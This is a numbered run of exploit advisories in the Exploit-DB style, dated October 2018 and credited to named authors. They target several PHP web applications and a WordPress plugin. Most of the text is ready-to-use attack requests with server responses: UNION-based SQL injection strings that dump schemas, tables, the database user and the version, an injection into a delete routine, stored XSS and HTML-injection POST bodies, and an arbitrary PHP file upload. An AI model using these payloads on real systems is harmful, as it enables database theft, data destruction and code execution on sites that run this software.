  20. # Exploit Title: Vishesh Auto Index 3.1 - 'fid' SQL Injection # Dork: N/A # Date: 2018-10-15 # Exploit Author: Ihsan Sencan # Vendor Homepage: http://www.vishesh.cf/ # Software Link: https://sourceforge.net/projects/vishesh-wap-auto-index/files/latest/download # Version: 3.1 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # POC: # 1) # http://192.168.1.27/[PATH]/file.php?fid=[SQL] -1%20UnioN%20seLECt%20112115%2c112115%2c112115%2c112115%2c112115%2c112115%2c(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)%2c112115%2c112115%2c112115%2c112115%2c112115%2c112115%2d%2d%20Efe GET /[PATH]/file.php?fid=-1%20UnioN%20seLECt%20112115%2c112115%2c112115%2c112115%2c112115%2c112115%2c(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)%2c112115%2c112115%2c112115%2c112115%2c112115%2c112115%2d%2d%20Efe HTTP/1.1 Host: 192.168.1.27 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: PHPSESSID=nk7b5obkruk2rtd2kbm3gamg42 Connection: keep-alive HTTP/1.1 200 OK Date: Sat, 15 Oct 2018 01:12:23 GMT Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 X-Powered-By: PHP/5.6.30 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 7799 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 # POC: # 2) # http://192.168.1.27/[PATH]/download.php?fid[SQL] -1%20UnioN%20select%20ConcAT((SElecT%20GrouP_ConcAT(schema_nAME%20SEPAratoR%200x3c62723e)%20FRom%20INFORmatION_ScheMA.SchematA))%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2d%2d%20Efe GET /[PATH]/download.php?fid=-1%20UnioN%20select%20ConcAT((SElecT%20GrouP_ConcAT(schema_nAME%20SEPAratoR%200x3c62723e)%20FRom%20INFORmatION_ScheMA.SchematA))%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2d%2d%20Efe HTTP/1.1 Host: 192.168.1.27 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: PHPSESSID=nk7b5obkruk2rtd2kbm3gamg42 Connection: keep-alive HTTP/1.1 200 OK Date: Sat, 15 Oct 2018 01:18:41 GMT Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 X-Powered-By: PHP/5.6.30 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 835 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
  21. # Exploit Title: Wordpress Plugin Support Board 1.2.3 - Cross-Site Scripting # Date: 2018-10-16 # Exploit Author: Ismail Tasdelen # Vendor Homepage: https://schiocco.com/ # Software Link : https://board.support/ # Software : Support Board - Chat And Help Desk # Version : v1.2.3 # Vulernability Type : Code Injection # Vulenrability : HTML Injection and Stored XSS # CVE : N/A # In the Schiocco "Support Board - Chat And Help Desk" plugin 1.2.3 for WordPress, # a Stored XSS vulnerability has been discovered in file upload areas in the # Chat and Help Desk sections via the msg parameter # in a /wp-admin/admin-ajax.php sb_ajax_add_message action. # HTTP POST Request : [Stored XSS] POST /wp-admin/admin-ajax.php HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://TARGET/chat/ Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 450 Cookie: _ga=GA1.2.1452102121.1539634100; _gid=GA1.2.1034601494.1539634100; PHPSESSID=pljbkl7n96fpl5uicnbec21f77 Connection: close action=sb_ajax_add_message&msg=&files=https%3A%2F%2FTARGET%2Fwp-content%2Fuploads%2Fsupportboard%2F70765091%2F%22%3E%3Cimg+src%3Dx+onerror%3Dalert(%22ismailtasdelen%22)%3E.jpg%7C%22%3E%3Cimg+src%3Dx+onerror%3Dalert(%22ismailtasdelen%22)%3E.jpg&time=10%2F15%2F2018%2C+4%3A23%3A42+PM&user_id=70765091&user_img=https%3A%2F%2Fboard.support%2Fwp-content%2Fuploads%2F2017%2F07%2Fuser.jpg&user_name=James+Wilson&user_type=user&environment=wp&sb_lang= # In the v1.2.3 version of the Support Board - Chat And Help Desk PHP & Wordpress Plugin, # the Stored XSS vulnerability has been discovered in the HTML Injection vulnerability and # file upload areas in the Chat and Help Desk sections of Schiocco. # HTTP POST Request : [HTML Injection] POST /wp-admin/admin-ajax.php HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://TARGET/desk-demo/ Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 288 Cookie: _ga=GA1.2.1452102121.1539634100; _gid=GA1.2.1034601494.1539634100; PHPSESSID=pljbkl7n96fpl5uicnbec21f77 Connection: close action=sb_ajax_add_message&msg=%26%238220%3B%3E%3Ch1%3EIsmail+Tasdelen%3C%2Fh1%3E&files=&time=10%2F15%2F2018%2C+4%3A19%3A45+PM&user_id=70765091&user_img=https%3A%2F%2Fboard.support%2Fwp-content%2Fuploads%2F2017%2F07%2Fuser.jpg&user_name=James+Wilson&user_type=user&environment=wp&sb_lang=
  22. # Exploit Title: MySQL Edit Table 1.0 - 'id' SQL Injection # Dork: N/A # Date: 2018-10-18 # Exploit Author: Ihsan Sencan # Vendor Homepage: https://www.bookman.nl # Software Link: https://sourceforge.net/projects/sql-edit-table/files/latest/download # Version: 1.0 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # POC: # 1) # http://localhost/[PATH]/example.php?mte_a=edit&id=[SQL] # function edit_rec() { # if (isset ($_GET['id'])) $in_id = $_GET['id']; # if ($_GET['mte_a'] == 'edit') $edit=1; # else $edit = 0; # $count_required = 0; # $rows = ''; # $result = mysqli_query($this->mysqli,"SHOW COLUMNS FROM `$this->table`"); GET /[PATH]/example.php?mte_a=edit&id=-18++UNIon(SEleCT+0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e)--+- HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Cookie: PHPSESSID=0v2bqm10m5rlph8563tiflttl7 DNT: 1 Connection: keep-alive Upgrade-Insecure-Requests: 1 If-Modified-Since: Thu, 18 Oct 2018 14:31:03 GMT HTTP/1.1 200 OK Date: Thu, 18 Oct 2018 14:34:58 GMT Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 X-Powered-By: PHP/5.6.30 Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: private Pragma: no-cache Last-Modified: Thu, 18 Oct 2018 14:34:58 GMT Content-Length: 3642 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 # POC: # 2) # http://localhost/[PATH]/example.php?mte_a=del&id=[SQL] # # function del_rec() { # $in_id = $_GET['id']; # if (mysqli_query($this->mysqli,"DELETE FROM $this->table WHERE `$this->primary_key` = '$in_id'")) { # $this->content_deleted = " GET /[PATH]/example.php?mte_a=del&id=%27%20%41%4e%44%20%45%58%54%52%41%43%54%56%41%4c%55%45%28%31%31%31%2c%43%4f%4e%43%41%54%28%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%31%31%31%3d%31%31%31%2c%31%29%29%29%29%29%2d%2d%20%45%66%65 HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Cookie: PHPSESSID=0v2bqm10m5rlph8563tiflttl7 DNT: 1 Connection: keep-alive Upgrade-Insecure-Requests: 1 If-Modified-Since: Thu, 18 Oct 2018 14:38:14 GMT HTTP/1.1 200 OK Date: Thu, 18 Oct 2018 14:38:18 GMT Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 X-Powered-By: PHP/5.6.30 Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: private Pragma: no-cache Last-Modified: Thu, 18 Oct 2018 14:38:18 GMT Content-Length: 1046 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
  23. # Exploit Title: Delta Sql 1.8.2 - Arbitrary File Upload # Dork: N/A # Date: 2018-10-25 # Exploit Author: Ihsan Sencan # Vendor Homepage: http://deltasql.sourceforge.net/ # Software Link: https://sourceforge.net/projects/deltasql/files/latest/download # Software Link: http://deltasql.sourceforge.net/deltasql/ # Version: 1.8.2 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # POC: # 1) # http://localhost/[PATH]/docs_manage.php?id=1 # # http://localhost/[PATH]/upload/[FILE] POST /[PATH]/docs_upload.php HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/[PATH]/docs_manage.php?id=1 Cookie: PHPSESSID=ra5c0bgati64a01fag01l8hhf0 Connection: keep-alive Content-Type: multipart/form-data; boundary= ---------------------------158943328914318561992147220435 Content-Length: 721 -----------------------------158943328914318561992147220435 Content-Disposition: form-data; name="fileToUpload"; filename="Efe.php" Content-Type: application/force-download <?php phpinfo(); ?> -----------------------------158943328914318561992147220435 Content-Disposition: form-data; name="submit" Upload File -----------------------------158943328914318561992147220435 Content-Disposition: form-data; name="id" 1 -----------------------------158943328914318561992147220435 Content-Disposition: form-data; name="version" -----------------------------158943328914318561992147220435 Content-Disposition: form-data; name="hasdocs" -----------------------------158943328914318561992147220435-- HTTP/1.1 200 OK Date: Thu, 24 Oct 2018 00:24:27 GMT Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 X-Powered-By: PHP/5.6.30 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 1783 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 <html> <body> <form action="http://localhost/[PATH]/docs_upload.php" method="post" enctype="multipart/form-data"> Select document to upload: <input name="fileToUpload" id="fileToUpload" type="file"> <input value="Ver Ayari" name="submit" type="submit"> <input value="1" name="id" type="hidden"> <input value="1'" name="version" type="hidden"> <input value="1" name="hasdocs" type="hidden"> </form> </body> </html>
  24. Exploit Title: Delta Sql 1.8.2 - 'id' SQL Injection # Dork: N/A # Date: 2018-10-25 # Exploit Author: Ihsan Sencan # Vendor Homepage: http://deltasql.sourceforge.net/ # Software Link: https://sourceforge.net/projects/deltasql/files/latest/download # Software Link: http://deltasql.sourceforge.net/deltasql/ # Version: 1.8.2 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # POC: # 1) # http://localhost/[PATH]/docs_manage.php?id=[SQL]&version=1&hasdocs=1 GET /[PATH]/docs_manage.php?id=1++uNiOn+seleCt+0x31,0x32,(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x),0x34,0x35--+-&version=1&hasdocs=1 HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: PHPSESSID=ra5c0bgati64a01fag01l8hhf0 Connection: keep-alive HTTP/1.1 200 OK Date: Thu, 24 Oct 2018 00:12:57 GMT Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 X-Powered-By: PHP/5.6.30 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 # POC: # 2) # http://localhost/[PATH]/list_project_modules.php?id=[SQL]&name=1 GET /[PATH]/list_project_modules.php?id=-1%20union%20select%20null,(0x32),null--&name=1 HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: PHPSESSID=ra5c0bgati64a01fag01l8hhf0 Connection: keep-alive HTTP/1.1 200 OK Date: Thu, 24 Oct 2018 00:08:03 GMT Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 X-Powered-By: PHP/5.6.30 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 2150 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
  25. # Exploit Title: Veterinary Clinic Management 00.02 - 'editpetnum' SQL Injection # Dork: N/A # Date: 2018-10-25 # Exploit Author: Ihsan Sencan # Vendor Homepage: https://vetclinic.sourceforge.io/ # Software Link: https://sourceforge.net/projects/vetclinic/files/latest/download # Version: 00.02 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # POC: # 1) # http://localhost/[PATH]/petmaint.php?editpetnum=[SQL] # # [PATH]/petmaint.php # .... #154 $editpetnum = ""; #155 #156 if(isset($_POST["editpetnum"])) { #157 $editpetnum = $_POST["editpetnum"]; #158 unset($_POST["editpetnum"]); #159 } #160 else if(isset($_GET["editpetnum"])) { #161 $editpetnum = $_GET["editpetnum"]; #162 unset($_GET["editpetnum"]); #163 } # .... GET /[PATH]/petmaint.php?editpetnum=-0x496873616e2053656e63616e+UniOn++SeLect++0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2cCONCAT(CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()))%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e--+Efe HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive HTTP/1.1 200 OK Date: Thu, 25 Oct 2018 22:18:01 GMT Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 X-Powered-By: PHP/5.6.30 Set-Cookie: PHPSESSID=8dts9gt545rgn1f5i4pgn573a3; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 # POC: # 2) # http://localhost/[PATH]/procmaint.php?proccode=[SQL] # # [PATH]/procmaint.php # .... #28 require_once "includes/common.inc"; #29 $emplnumber = $_SESSION['employeenumber']; #30 $display = "ProcMaint:".$emplnumber; #31 if(isset($_GET["proccode"])) { #32 $proccode = $_GET["proccode"]; #33 } else { #34 $proccode = ""; #35 } #36 if ($proccode == "") #37 { # .... GET /[PATH]/procmaint.php?proccode=%27%27%27%27+unioN+selECt++nuLL,nuLL,nuLL,conCAT(0x496873616e2053656e63616e),nuLL--+Efe HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: PHPSESSID=8dts9gt545rgn1f5i4pgn573a3 Connection: keep-alive HTTP/1.1 200 OK Date: Thu, 25 Oct 2018 22:22:33 GMT Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 X-Powered-By: PHP/5.6.30 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 2697 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8